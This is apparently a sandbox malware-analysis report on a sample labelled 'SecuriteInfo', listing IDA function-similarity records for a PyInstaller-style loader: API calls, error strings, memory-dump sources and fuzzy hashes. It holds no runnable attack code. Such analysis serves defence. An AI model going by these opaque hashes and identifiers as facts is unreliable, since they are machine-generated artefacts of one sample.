                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                    • Instruction ID: f9a1893314f68a6a40ae7e94724b50d272ac2a715edb2d6b083f86053a19f996
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18519536A2965185E726AF2DC04023A77A0EB66B58F644131CF4C177BDEF7AE843C760
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                    • Instruction ID: 0102f6562c7d8af2e52c96e8ff10f96d3a3d5ad9ef1daf7014a1a897cc0ec41d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3651B876A2A65185E725AF2DC04023A77B0EB56B58F644131CF4C177ACEF7AE843C760
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                    • Instruction ID: 14fb8fcc1249d7846f9653df4cc1a083b6d65fbc47e3a54f77487dc12237374e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7841886282B78A05E997B91C0504E7A96809F337A0DD85274DFBD173FBED4D6586C320
                                                                                                                                                                                                                                    Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
• Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
• Instruction ID: d974406722d87f4102e43e53f3fb94b793ffc07126476e52db64e4594a21d669
• Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
• Instruction Fuzzy Hash: 6541E422715A5582EF44EF2ED9141AAA391B759FD0B899437DF0D97B68FE7CD042C300
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
• Instruction ID: ca42d6e7e9ddb0c1886ccbd50c058dcc2d81e46546fd7a33a1dbccd14cff2bb3
• Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
• Instruction Fuzzy Hash: 6331E43270AB4141E656BF2D644012FAAD4AF96BD0F844638EB4D57BE9EF7CD001C710
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
• Instruction ID: 0e918a9ca1d53ac2e8f58792754d79baaa20aac506fa7b375f08a90711c74ddd
• Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
• Instruction Fuzzy Hash: 0DF044727196958ADB9A9F6DA40262AB7D0F7593C0F84C039D68D83B08DE7C9051CF14
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
• Instruction ID: 95ca482e75259bbe3962d1a9c324b6904edd8be1f173262d45ef2703bbafc12b
• Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
• Instruction Fuzzy Hash: 40A0012190E80AD0E646AB19E8A4026A620BB66310BC44039E24D950B8AEACA404E325
APIs
Strings
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
• API String ID: 199729137-3427451314
• Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
• Instruction ID: 7cee0317d960ab9893017302a2c4e8651fb670b036d71077773a85c5d6a10499
• Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
• Instruction Fuzzy Hash: 2E02CE2490BB0790FA47BB2DA818976E261BF27754BD4013AC61D862ACFFBCB545D270
APIs
  • Part of subcall function 00007FF7B2B69390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7B2B645F4,00000000,00007FF7B2B61985), ref: 00007FF7B2B693C9
• ExpandEnvironmentStringsW.KERNEL32(?,00007FF7B2B686B7,?,?,00000000,00007FF7B2B63CBB), ref: 00007FF7B2B6822C
  • Part of subcall function 00007FF7B2B62810: MessageBoxW.USER32 ref: 00007FF7B2B628EA
Strings
Similarity
• API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
• String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
• API String ID: 1662231829-930877121
• Opcode ID: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
• Instruction ID: 4818b52453b51d62472c0378ddbe64f7ebf60f7328583c4c5c13f56a5c09139a
• Opcode Fuzzy Hash: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
• Instruction Fuzzy Hash: 7151A411A1A64340FA53BB2C98556BBE260EF66740FC44436E74EC66DDFEACE404C364
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: MoveWindow$ObjectSelect$DrawReleaseText
• String ID: P%
• API String ID: 2147705588-2959514604
Similarity
• API ID: LongWindow$BlockCreateErrorLastReasonShutdown
• String ID: Needs to remove its temporary files.
• API String ID: 3975851968-2863640275
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: -$:$f$p$p
• API String ID: 3215553584-2013873522
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: f$f$p$p$f
• API String ID: 3215553584-1325933183
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                    • API String ID: 849930591-393685449
                                                                                                                                                                                                                                    • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                    • Instruction ID: 23daf4a7cd6240d1c1b03808ed336db263f652e9377165b83e0f2c1598caad09
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57D1C22290974286EB22AF6994807AEF7A0FB66788F440135DF4D9779DEF78E042C714
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B2B63706,?,00007FF7B2B63804), ref: 00007FF7B2B62C9E
                                                                                                                                                                                                                                    • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B2B63706,?,00007FF7B2B63804), ref: 00007FF7B2B62D63
                                                                                                                                                                                                                                    • MessageBoxW.USER32 ref: 00007FF7B2B62D99
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                    • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                    • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                    • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                    • Instruction ID: dbe2e5dddbff3a4d54fc918a9b037df6f06ce0f6b101bdbb2b1c8e9d67e548f6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A31F822709A4142F622BB29A8142ABF691BF99788F800136EF4DD775DFF7CD506C710
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF7B2B6DF7A,?,?,?,00007FF7B2B6DC6C,?,?,?,00007FF7B2B6D869), ref: 00007FF7B2B6DD4D
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF7B2B6DF7A,?,?,?,00007FF7B2B6DC6C,?,?,?,00007FF7B2B6D869), ref: 00007FF7B2B6DD5B
                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF7B2B6DF7A,?,?,?,00007FF7B2B6DC6C,?,?,?,00007FF7B2B6D869), ref: 00007FF7B2B6DD85
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF7B2B6DF7A,?,?,?,00007FF7B2B6DC6C,?,?,?,00007FF7B2B6D869), ref: 00007FF7B2B6DDF3
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF7B2B6DF7A,?,?,?,00007FF7B2B6DC6C,?,?,?,00007FF7B2B6D869), ref: 00007FF7B2B6DDFF
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                                                                                    • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                    • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                    • Instruction ID: 54afd11ce53b674d5d73d884eed212910d6a18f819cd1efb76245513016dc380
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6331D321B1B60281EE13BB1A9400676E394FF27BA4F990535DF1D8A398FEBCE040D324
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                    • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                    • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                    • Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                                    • Instruction ID: 73ec254de23d850c5025af6fad3383a3b7f3c8320976cccf0b7bec119941a8e9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A941B321A1AA8691EA17EB28E4181EBE311FF66340FC00136DB5C8769DFFBCE515C360
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7B2B6351A,?,00000000,00007FF7B2B63F23), ref: 00007FF7B2B62AA0
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                    • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                    • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                    • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                    • Instruction ID: af8f5270a3ab3a0a3036792c9bee97f3e703a4e496ffdebd4539f8ee686ade3c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5221B13261A78182E622AB29B8417E7F294FB99384F800136EF8C9375DEFBCD145C750

APIs
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
• Instruction ID: b7df2a62a2aaea6be40c9e0cf40f393490a7c80dc4d355fcf58d23aee2dace7c
• Opcode Fuzzy Hash: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
• Instruction Fuzzy Hash: 9021AF20A0F24281F65B776D555113BD2425F767B0F904634DB3E46BEEFDACA481CB20

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
• Instruction ID: 614847d7d1537a0ea4eb4ee3cb15e8dcac57bbd8e028964497da16c8bb366705
• Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
• Instruction Fuzzy Hash: 8B11DA21719A4182E751AB1AE84833AF6A0FB99FE4F540234DB5D8B7ACEFBCD440C710

APIs
• GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF7B2B63FB1), ref: 00007FF7B2B68EFD
• K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF7B2B63FB1), ref: 00007FF7B2B68F5A
  • Part of subcall function 00007FF7B2B69390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7B2B645F4,00000000,00007FF7B2B61985), ref: 00007FF7B2B693C9
• K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7B2B63FB1), ref: 00007FF7B2B68FE5
• K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7B2B63FB1), ref: 00007FF7B2B69044
• FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7B2B63FB1), ref: 00007FF7B2B69055
• FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7B2B63FB1), ref: 00007FF7B2B6906A
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
• String ID:
• API String ID: 3462794448-0
• Opcode ID: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
• Instruction ID: a98cf290ef694c4207205ea9c9f60dbf5f0e35ac7a1d52a7dd059e6231f6c00c
• Opcode Fuzzy Hash: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
• Instruction Fuzzy Hash: 0441A861A1AA8181EA32BB1AA5442BBF394FB96BC4F840135DF4D9778DEEBCD500C714

APIs
• GetLastError.KERNEL32(?,?,?,00007FF7B2B74F11,?,?,?,?,00007FF7B2B7A48A,?,?,?,?,00007FF7B2B7718F), ref: 00007FF7B2B7B2D7
• FlsSetValue.KERNEL32(?,?,?,00007FF7B2B74F11,?,?,?,?,00007FF7B2B7A48A,?,?,?,?,00007FF7B2B7718F), ref: 00007FF7B2B7B30D
• FlsSetValue.KERNEL32(?,?,?,00007FF7B2B74F11,?,?,?,?,00007FF7B2B7A48A,?,?,?,?,00007FF7B2B7718F), ref: 00007FF7B2B7B33A
• FlsSetValue.KERNEL32(?,?,?,00007FF7B2B74F11,?,?,?,?,00007FF7B2B7A48A,?,?,?,?,00007FF7B2B7718F), ref: 00007FF7B2B7B34B
• FlsSetValue.KERNEL32(?,?,?,00007FF7B2B74F11,?,?,?,?,00007FF7B2B7A48A,?,?,?,?,00007FF7B2B7718F), ref: 00007FF7B2B7B35C
